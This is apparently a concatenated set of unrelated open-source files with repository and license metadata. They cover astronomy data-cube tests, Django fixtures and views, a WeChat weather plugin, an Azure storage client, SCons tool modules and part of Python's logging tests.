spec.value)
@pytest.mark.parametrize(('init_unit'), bunits_list_1D)
def test_multibeams_unit_conversions_general_1D(data_vda_beams, use_dask, init_unit):
cube, data = cube_and_raw(data_vda_beams, use_dask=use_dask)
cube._meta['BUNIT'] = init_unit.to_string()
cube._unit = init_unit
spec = cube[:, 0, 0]
# Check all unit conversion combos:
for targ_unit in bunits_list_1D:
newspec = spec.to(targ_unit)
if init_unit == targ_unit:
np.testing.assert_almost_equal(newspec.value,
spec.value)
else:
roundtrip_spec = newspec.to(init_unit)
np.testing.assert_almost_equal(roundtrip_spec.value,
spec.value)
def test_basic_arrayness(data_adv, use_dask):
cube, data = cube_and_raw(data_adv, use_dask=use_dask)
assert cube.shape == data.shape
spec = cube[:,0,0]
assert np.all(np.asanyarray(spec).value == data[:,0,0])
assert np.all(np.array(spec) == data[:,0,0])
assert np.all(np.asarray(spec) == data[:,0,0])
# These are commented out because it is presently not possible to convert
# projections to masked arrays
# assert np.all(np.ma.asanyarray(spec).value == data[:,0,0])
# assert np.all(np.ma.asarray(spec) == data[:,0,0])
# assert np.all(np.ma.array(spec) == data[:,0,0])
slc = cube[0,:,:]
assert np.all(np.asanyarray(slc).value == data[0,:,:])
assert np.all(np.array(slc) == data[0,:,:])
assert np.all(np.asarray(slc) == data[0,:,:])
# assert np.all(np.ma.asanyarray(slc).value == data[0,:,:])
# assert np.all(np.ma.asarray(slc) == data[0,:,:])
# assert np.all(np.ma.array(slc) == data[0,:,:])
def test_spatial_world_extrema_2D(data_522_delta, use_dask):
hdu = fits.open(data_522_delta)[0]
cube = SpectralCube.read(hdu, use_dask=use_dask)
plane = cube[0]
assert (cube.world_extrema == plane.world_extrema).all()
assert (cube.longitude_extrema == plane.longitude_extrema).all()
assert (cube.latitude_extrema == plane.latitude_extrema).all()
@pytest.mark.parametrize('view', (np.s_[:, :],
np.s_[::2, :],
np.s_[0]))
def test_spatial_world(view, data_adv, use_dask):
p = path(data_adv)
# d = fits.getdata(p)
# wcs = WCS(p)
# c = SpectralCube(d, wcs)
c = SpectralCube.read(p, use_dask=use_dask)
plane = c[0]
wcs = plane.wcs
shp = plane.shape
inds = np.indices(plane.shape)
pix = np.column_stack([i.ravel() for i in inds[::-1]])
world = wcs.all_pix2world(pix, 0).T
world = [w.reshape(shp) for w in world]
world = [w[view] * u.Unit(wcs.wcs.cunit[i])
for i, w in enumerate(world)][::-1]
w2 = plane.world[view]
for result, expected in zip(w2, world):
assert_allclose(result, expected)
# Test world_flattened here, too
# TODO: Enable once 2D masking is a thing
w2_flat = plane.flattened_world(view=view)
for result, expected in zip(w2_flat, world):
print(result.shape, expected.flatten().shape)
assert_allclose(result, expected.flatten())
|
e-koch/spectral-cube
|
spectral_cube/tests/test_projection.py
|
Python
|
bsd-3-clause
| 27,131
|
#!/usr/bin/env python
from __future__ import division
__author__ = 'youval.dar'
|
youdar/usesul_functions
|
source/read_write_to_mysql/__init__.py
|
Python
|
mit
| 84
|
from __future__ import absolute_import
from HTMLParser import *
|
timothycrosley/pies
|
pies2overrides/html/parser.py
|
Python
|
mit
| 65
|
import pytest
@pytest.fixture
def builtins_open(mocker):
return mocker.patch('six.moves.builtins.open')
@pytest.fixture
def isfile(mocker):
return mocker.patch('os.path.isfile', return_value=True)
@pytest.fixture
@pytest.mark.usefixtures('isfile')
def history_lines(mocker):
def aux(lines):
mock = mocker.patch('io.open')
mock.return_value.__enter__ \
.return_value.readlines.return_value = lines
return aux
|
lawrencebenson/thefuck
|
tests/shells/conftest.py
|
Python
|
mit
| 459
|
from datetime import date, time, timedelta
from decimal import Decimal
import itertools
from django.utils import timezone
from six.moves import xrange
from .models import Person
def get_fixtures(n=None):
"""
Returns `n` dictionaries of `Person` objects.
If `n` is not specified it defaults to 6.
"""
_now = timezone.now().replace(microsecond=0) # mysql doesn't do microseconds. # NOQA
_date = date(2015, 3, 28)
_time = time(13, 0)
fixtures = [
{
'big_age': 59999999999999999, 'comma_separated_age': '1,2,3',
'age': -99, 'positive_age': 9999, 'positive_small_age': 299,
'small_age': -299, 'certified': False, 'null_certified': None,
'name': 'Mike', 'email': 'miketakeahike@mailinator.com',
'file_path': '/Users/user/fixtures.json', 'slug': 'mike',
'text': 'here is a dummy text',
'url': 'https://docs.djangoproject.com',
'height': Decimal('1.81'), 'date_time': _now,
'date': _date, 'time': _time, 'float_height': 0.3,
'remote_addr': '192.0.2.30', 'my_file': 'dummy.txt',
'image': 'kitten.jpg', 'data': {'name': 'Mike', 'age': -99},
},
{
'big_age': 245999992349999, 'comma_separated_age': '6,2,9',
'age': 25, 'positive_age': 49999, 'positive_small_age': 315,
'small_age': 5409, 'certified': False, 'null_certified': True,
'name': 'Pete', 'email': 'petekweetookniet@mailinator.com',
'file_path': 'users.json', 'slug': 'pete', 'text': 'dummy',
'url': 'https://google.com', 'height': Decimal('1.93'),
'date_time': _now, 'date': _date, 'time': _time,
'float_height': 0.5, 'remote_addr': '127.0.0.1',
'my_file': 'fixtures.json',
'data': [{'name': 'Pete'}, {'name': 'Mike'}],
},
{
'big_age': 9929992349999, 'comma_separated_age': '6,2,9,10,5',
'age': 29, 'positive_age': 412399, 'positive_small_age': 23315,
'small_age': -5409, 'certified': False, 'null_certified': True,
'name': 'Ash', 'email': 'rashash@mailinator.com',
'file_path': '/Downloads/kitten.jpg', 'slug': 'ash',
'text': 'bla bla bla', 'url': 'news.ycombinator.com',
'height': Decimal('1.78'), 'date_time': _now,
'date': _date, 'time': _time,
'float_height': 0.8, 'my_file': 'dummy.png',
'data': {'text': 'bla bla bla', 'names': ['Mike', 'Pete']},
},
{
'big_age': 9992349234, 'comma_separated_age': '12,29,10,5',
'age': -29, 'positive_age': 4199, 'positive_small_age': 115,
'small_age': 909, 'certified': True, 'null_certified': False,
'name': 'Mary', 'email': 'marykrismas@mailinator.com',
'file_path': 'dummy.png', 'slug': 'mary',
'text': 'bla bla bla bla bla', 'url': 'news.ycombinator.com',
'height': Decimal('1.65'), 'date_time': _now,
'date': _date, 'time': _time, 'float_height': 0,
'remote_addr': '2a02:42fe::4',
'data': {'names': {'name': 'Mary'}},
},
{
'big_age': 999234, 'comma_separated_age': '12,1,30,50',
'age': 1, 'positive_age': 99199, 'positive_small_age': 5,
'small_age': -909, 'certified': False, 'null_certified': False,
'name': 'Sandra', 'email': 'sandrasalamandr@mailinator.com',
'file_path': '/home/dummy.png', 'slug': 'sandra',
'text': 'this is a dummy text', 'url': 'google.com',
'height': Decimal('1.59'), 'date_time': _now,
'date': _date, 'time': _time, 'float_height': 2 ** 2,
'image': 'dummy.jpeg', 'data': {},
},
{
'big_age': 9999999999, 'comma_separated_age': '1,100,3,5',
'age': 35, 'positive_age': 1111, 'positive_small_age': 500,
'small_age': 110, 'certified': True, 'null_certified': None,
'name': 'Crystal', 'email': 'crystalpalace@mailinator.com',
'file_path': '/home/dummy.txt', 'slug': 'crystal',
'text': 'dummy text', 'url': 'docs.djangoproject.com',
'height': Decimal('1.71'), 'date_time': _now,
'date': _date, 'time': _time, 'float_height': 2 ** 10,
'image': 'dummy.png', 'data': [],
},
]
n = n or len(fixtures)
fixtures = itertools.cycle(fixtures)
for _ in xrange(n):
yield next(fixtures)
def create_fixtures(n=None):
"""
Wrapper for Person.bulk_create which creates `n` fixtures
"""
Person.objects.bulk_create(Person(**person)
for person in get_fixtures(n))
|
lead-ratings/django-bulk-update
|
tests/fixtures.py
|
Python
|
mit
| 4,775
|
TASKS = {
"tests.tasks.general.Retry": {
"max_retries": 1,
"retry_delay": 1
}
}
|
IAlwaysBeCoding/mrq
|
tests/fixtures/config-retry1.py
|
Python
|
mit
| 105
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from .. import app, celery
import hashlib
import hmac
import time
import requests
from . import wechat_custom
@celery.task
def get(openid):
"""获取天气与空气质量预报"""
content = []
current_hour = time.strftime('%H')
try:
pm_25_info = get_pm2_5_info()
except Exception, e:
app.logger.warning(u'PM2.5 API 超时出错:%s' % e)
else:
title_aqi = u'空气质量等级:%s\n%s点的平均PM2.5:%s' % (
pm_25_info[0]['quality'], current_hour, pm_25_info[0]['pm2_5'])
content.append({"title": title_aqi})
try:
weather_info = get_weather_info()
except Exception, e:
app.logger.warning(u'天气 API 超时出错:%s' % e)
content = u"天气查询超时\n请稍后重试"
wechat_custom.send_text(openid, content)
else:
for index, data in enumerate(weather_info):
title_weather = u'%s %s℃\n%s %s ' % (
day_of_week(offset=index),
data['temp'],
data['weather'],
data['wind'])
content.append({"title": title_weather, "picurl": data['img_url']})
wechat_custom.send_news(openid, content)
def get_weather_info():
"""
查询气象
API 详情:http://openweather.weather.com.cn/Home/Help/Product.html
气象图片下载:http://openweather.weather.com.cn/Home/Help/icon/iid/10.html
"""
private_key = app.config['WEATHER_PRIVATE_KEY']
appid = app.config['WEATHER_APPID']
appid_six = appid[:6]
areaid = '101281601' # 东莞代号
date = time.strftime('%Y%m%d%H%M')
# 根据 API 文档生成请求 URL
public_key = 'http://open.weather.com.cn/data/?' +\
'areaid=%s&type=forecast_v&date=%s&appid=%s' % (areaid, date, appid)
key = hmac.new(private_key, public_key, hashlib.sha1).digest().encode(
'base64').rstrip()
url = 'http://open.weather.com.cn/data/?' +\
'areaid=%s&type=forecast_v&date=%s&appid=%s&key=%s' % (
areaid, date, appid_six, key)
res = requests.get(url, timeout=7)
weather_info = res.json()['f']['f1']
# 解析为可读数据
img_url = "http://gxgk-wechat.b0.upaiyun.com/weather/day/%s.jpeg"
data = []
for weather in weather_info:
# 到了晚上,当日白天的数据为空,所以使用晚上的数据
if weather['fa'] == u'':
temp = weather['fd']
weather_code = weather['fb']
wind_code = weather['ff']
else:
temp = weather['fc']
weather_code = weather['fa']
wind_code = weather['fe']
data.append({
"temp": temp,
"weather": weather_code_to_text(weather_code),
"wind": wind_code_to_text(wind_code),
"img_url": img_url % weather_code
})
return data
def get_pm2_5_info():
"""
空气质量
API 详情:http://www.pm25.in/api_doc
"""
url = 'http://www.pm25.in/api/querys/pm2_5.json?' +\
'city=dongguan&token=%s&stations=no' % app.config['PM2_5_TOKEN']
res = requests.get(url, timeout=7)
return res.json()
def day_of_week(offset=0):
"""获取星期几"""
day_of_week = int(time.strftime('%w')) + offset
days = [u'周日', u'周一', u'周二', u'周三', u'周四', u'周五', u'周六',
u'周日', u'周一']
prefix = [u'今天', u'明天', u'后天']
return prefix[offset] + days[day_of_week]
def weather_code_to_text(code):
"""转换天气代码为文字"""
weather_list = [u'晴', u'多云', u'阴', u'阵雨', u'雷阵雨', u'雷阵雨伴有冰雹',
u'雨夹雪', u'小雨', u'中雨', u'大雨', u'暴雨', u'大暴雨',
u'特大暴雨', u'阵雪', u'小雪', u'中雪', u'大雪', u'暴雪', u'雾',
u'冻雨', u'沙尘暴', u'小到中雨', u'中到大雨', u'大到暴雨',
u'暴雨到大暴雨', u'大暴雨到特大暴雨', u'小到中雪', u'中到大雪',
u'大到暴雪', u'浮尘', u'扬沙', u'强沙尘暴', u'霾', u'无']
return weather_list[int(code)]
def wind_code_to_text(code):
"""转换风向代码为文字"""
wind_list = [u'微风', u'东北风', u'东风', u'东南风', u'南风', u'西南风',
u'西风', u'西北风', u'北风', u'旋转风']
return wind_list[int(code)]
|
15klli/WeChat-Clone
|
main/plugins/weather.py
|
Python
|
mit
| 4,482
|
import astropy.io.fits
import numpy as np
import matplotlib.pyplot as plt
# Create an empty numpy array. 2D; spectra with 4 data elements.
filtered = np.zeros((2040,4))
combined_extracted_1d_spectra_ = astropy.io.fits.open("xtfbrsnN20160705S0025.fits")
exptime = float(combined_extracted_1d_spectra_[0].header['EXPTIME'])
wstart = combined_extracted_1d_spectra_[1].header['CRVAL1']
wdelt = combined_extracted_1d_spectra_[1].header['CD1_1']
for i in range(len(filtered)):
filtered[i][0] = wstart + (i*wdelt)
print "Wavelength array: \n", filtered
f = open("hk.txt")
lines = f.readlines()
f.close()
lines = [lines[i].strip().split() for i in range(len(lines))]
for i in range(len(lines)):
lines[i][0] = float(lines[i][0])*10**4
for i in range(len(filtered)):
mindif = min(lines, key=lambda x:abs(x[0]-filtered[i][0]))
filtered[i][1] = mindif[2]
calibspec = np.load("calibspec.npy")
"""
effspec = np.load("effspec.npy")
print "Effspec:\n", effspec
calibspec = np.zeros((2040))
for i in range(len(effspec)):
if effspec[i] != 0:
calibspec[i] = combined_extracted_1d_spectra_[1].data[i]/exptime/effspec[i]
else:
calibspec[i] = 0
"""
filter_weighted_flux = []
temp_percentages = []
for i in range(len(calibspec)):
filtered[i][2] = calibspec[i]
filtered[i][3] = filtered[i][1] * filtered[i][2] * 0.01
filter_weighted_flux.append(filtered[i][3])
temp_percentages.append(filtered[i][1]*0.01)
print "\nIntegral of filter_weighted_flux:"
print np.trapz(filter_weighted_flux)
print "\nIntegral of percentages:"
print np.trapz(temp_percentages)
print "Integral of filter_weighted_flux divided by integral of percentages:"
print np.trapz(filter_weighted_flux)/np.trapz(temp_percentages)
plt.figure(1)
plt.plot(calibspec)
plt.plot(filter_weighted_flux, "r--")
plt.figure(2)
plt.plot(temp_percentages)
plt.show()
|
mrlb05/Nifty
|
tests/generate_response_curve.py
|
Python
|
mit
| 1,827
|
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator 1.1.0.0
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.service_client import ServiceClient
from msrest import Serializer, Deserializer
from msrestazure import AzureConfiguration
from .version import VERSION
from .operations.storage_accounts_operations import StorageAccountsOperations
from .operations.usage_operations import UsageOperations
from . import models
class StorageManagementClientConfiguration(AzureConfiguration):
"""Configuration for StorageManagementClient
Note that all parameters used to create this instance are saved as instance
attributes.
:param credentials: Credentials needed for the client to connect to Azure.
:type credentials: :mod:`A msrestazure Credentials
object<msrestazure.azure_active_directory>`
:param subscription_id: Gets subscription credentials which uniquely
identify Microsoft Azure subscription. The subscription ID forms part of
the URI for every service call.
:type subscription_id: str
:param str base_url: Service URL
"""
def __init__(
self, credentials, subscription_id, base_url=None):
if credentials is None:
raise ValueError("Parameter 'credentials' must not be None.")
if subscription_id is None:
raise ValueError("Parameter 'subscription_id' must not be None.")
if not isinstance(subscription_id, str):
raise TypeError("Parameter 'subscription_id' must be str.")
if not base_url:
base_url = 'https://management.azure.com'
super(StorageManagementClientConfiguration, self).__init__(base_url)
self.add_user_agent('storagemanagementclient/{}'.format(VERSION))
self.add_user_agent('Azure-SDK-For-Python')
self.credentials = credentials
self.subscription_id = subscription_id
class StorageManagementClient(object):
"""The Storage Management Client.
:ivar config: Configuration for client.
:vartype config: StorageManagementClientConfiguration
:ivar storage_accounts: StorageAccounts operations
:vartype storage_accounts: storage.operations.StorageAccountsOperations
:ivar usage: Usage operations
:vartype usage: storage.operations.UsageOperations
:param credentials: Credentials needed for the client to connect to Azure.
:type credentials: :mod:`A msrestazure Credentials
object<msrestazure.azure_active_directory>`
:param subscription_id: Gets subscription credentials which uniquely
identify Microsoft Azure subscription. The subscription ID forms part of
the URI for every service call.
:type subscription_id: str
:param str base_url: Service URL
"""
def __init__(
self, credentials, subscription_id, base_url=None):
self.config = StorageManagementClientConfiguration(credentials, subscription_id, base_url)
self._client = ServiceClient(self.config.credentials, self.config)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self.api_version = '2015-06-15'
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
self.storage_accounts = StorageAccountsOperations(
self._client, self.config, self._serialize, self._deserialize)
self.usage = UsageOperations(
self._client, self.config, self._serialize, self._deserialize)
|
dsgouda/autorest
|
Samples/2a-validation/Python/storage/storage_management_client.py
|
Python
|
mit
| 3,693
|
"""SCons.Tool.aixc++
Tool-specific initialization for IBM xlC / Visual Age C++ compiler.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/aixc++.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
import os.path
import SCons.Platform.aix
cplusplus = __import__('c++', globals(), locals(), [])
packages = ['vacpp.cmp.core', 'vacpp.cmp.batch', 'vacpp.cmp.C', 'ibmcxx.cmp']
def get_xlc(env):
xlc = env.get('CXX', 'xlC')
return SCons.Platform.aix.get_xlc(env, xlc, packages)
def generate(env):
"""Add Builders and construction variables for xlC / Visual Age
suite to an Environment."""
path, _cxx, version = get_xlc(env)
if path and _cxx:
_cxx = os.path.join(path, _cxx)
if 'CXX' not in env:
env['CXX'] = _cxx
cplusplus.generate(env)
if version:
env['CXXVERSION'] = version
def exists(env):
path, _cxx, version = get_xlc(env)
if path and _cxx:
xlc = os.path.join(path, _cxx)
if os.path.exists(xlc):
return xlc
return None
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
EmanueleCannizzaro/scons
|
src/engine/SCons/Tool/aixc++.py
|
Python
|
mit
| 2,413
|
"""SCons.Tool.yacc
Tool-specific initialization for yacc.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/yacc.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
import os.path
import SCons.Defaults
import SCons.Tool
import SCons.Util
YaccAction = SCons.Action.Action("$YACCCOM", "$YACCCOMSTR")
def _yaccEmitter(target, source, env, ysuf, hsuf):
yaccflags = env.subst("$YACCFLAGS", target=target, source=source)
flags = SCons.Util.CLVar(yaccflags)
targetBase, targetExt = os.path.splitext(SCons.Util.to_String(target[0]))
if '.ym' in ysuf: # If using Objective-C
target = [targetBase + ".m"] # the extension is ".m".
# If -d is specified on the command line, yacc will emit a .h
# or .hpp file with the same name as the .c or .cpp output file.
if '-d' in flags:
target.append(targetBase + env.subst(hsuf, target=target, source=source))
# If -g is specified on the command line, yacc will emit a .vcg
# file with the same base name as the .y, .yacc, .ym or .yy file.
if "-g" in flags:
base, ext = os.path.splitext(SCons.Util.to_String(source[0]))
target.append(base + env.subst("$YACCVCGFILESUFFIX"))
# If -v is specified yacc will create the output debug file
# which is not really source for any process, but should
# be noted and also be cleaned
# Bug #2558
if "-v" in flags:
env.SideEffect(targetBase+'.output',target[0])
env.Clean(target[0],targetBase+'.output')
# With --defines and --graph, the name of the file is totally defined
# in the options.
fileGenOptions = ["--defines=", "--graph="]
for option in flags:
for fileGenOption in fileGenOptions:
l = len(fileGenOption)
if option[:l] == fileGenOption:
# A file generating option is present, so add the file
# name to the list of targets.
fileName = option[l:].strip()
target.append(fileName)
return (target, source)
def yEmitter(target, source, env):
return _yaccEmitter(target, source, env, ['.y', '.yacc'], '$YACCHFILESUFFIX')
def ymEmitter(target, source, env):
return _yaccEmitter(target, source, env, ['.ym'], '$YACCHFILESUFFIX')
def yyEmitter(target, source, env):
return _yaccEmitter(target, source, env, ['.yy'], '$YACCHXXFILESUFFIX')
def generate(env):
"""Add Builders and construction variables for yacc to an Environment."""
c_file, cxx_file = SCons.Tool.createCFileBuilders(env)
# C
c_file.add_action('.y', YaccAction)
c_file.add_emitter('.y', yEmitter)
c_file.add_action('.yacc', YaccAction)
c_file.add_emitter('.yacc', yEmitter)
# Objective-C
c_file.add_action('.ym', YaccAction)
c_file.add_emitter('.ym', ymEmitter)
# C++
cxx_file.add_action('.yy', YaccAction)
cxx_file.add_emitter('.yy', yyEmitter)
env['YACC'] = env.Detect('bison') or 'yacc'
env['YACCFLAGS'] = SCons.Util.CLVar('')
env['YACCCOM'] = '$YACC $YACCFLAGS -o $TARGET $SOURCES'
env['YACCHFILESUFFIX'] = '.h'
env['YACCHXXFILESUFFIX'] = '.hpp'
env['YACCVCGFILESUFFIX'] = '.vcg'
def exists(env):
return env.Detect(['bison', 'yacc'])
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
EmanueleCannizzaro/scons
|
src/engine/SCons/Tool/yacc.py
|
Python
|
mit
| 4,613
|
from django.views.generic import ListView, DetailView, CreateView, \
DeleteView, UpdateView
from baseapp.models import Disadvantaged_group
from django.contrib import auth, messages
class Disadvantaged_groupView(object):
model = Disadvantaged_group
def get_template_names(self):
"""Nest templates within disadvantaged_group directory."""
tpl = super(Disadvantaged_groupView, self).get_template_names()[0]
app = self.model._meta.app_label
mdl = 'disadvantaged_group'
self.template_name = tpl.replace(app, '{0}/{1}'.format(app, mdl))
return [self.template_name]
class Disadvantaged_groupBaseListView(Disadvantaged_groupView):
paginate_by = 10
class Disadvantaged_groupCreateView(Disadvantaged_groupView, CreateView):
def get_success_url(self):
from django.core.urlresolvers import reverse
messages.add_message(
self.request,
messages.SUCCESS,"Successfully created."
)
return reverse('baseapp_disadvantaged_group_list')
class Disadvantaged_groupDeleteView(Disadvantaged_groupView, DeleteView):
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('baseapp_disadvantaged_group_list')
class Disadvantaged_groupDetailView(Disadvantaged_groupView, DetailView):
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('baseapp_disadvantaged_group_list')
class Disadvantaged_groupListView(Disadvantaged_groupBaseListView, ListView):
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('baseapp_disadvantaged_group_list')
class Disadvantaged_groupUpdateView(Disadvantaged_groupView, UpdateView):
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('baseapp_disadvantaged_group_list')
|
tnemis/staging-server
|
baseapp/views/disadvantaged_group_views.py
|
Python
|
mit
| 1,981
|
#!/usr/bin/env python
#
# Copyright 2001-2012 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2012 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import datetime
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import select
import socket
import struct
import sys
import tempfile
from test.support import (captured_stdout, run_with_locale, run_unittest,
patch, requires_zlib, TestHandler, Matcher)
import textwrap
import time
import unittest
import warnings
import weakref
try:
import threading
# The following imports are needed only for tests which
# require threading
import asynchat
import asyncore
import errno
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
except ImportError:
threading = None
try:
import win32evtlog
except ImportError:
win32evtlog = None
try:
import win32evtlogutil
except ImportError:
win32evtlogutil = None
win32evtlog = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> ([\w]+): ([\d]+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_level_names = logging._levelNames.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelNames.clear()
logging._levelNames.update(self.saved_level_names)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
loggerDict = logging.getLogger().manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
def assert_log_lines(self, expected_values, stream=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(self.expected_log_pat)
try:
stream.reset()
actual_lines = stream.readlines()
except AttributeError:
# StringIO.StringIO lacks a reset() method.
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
#Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
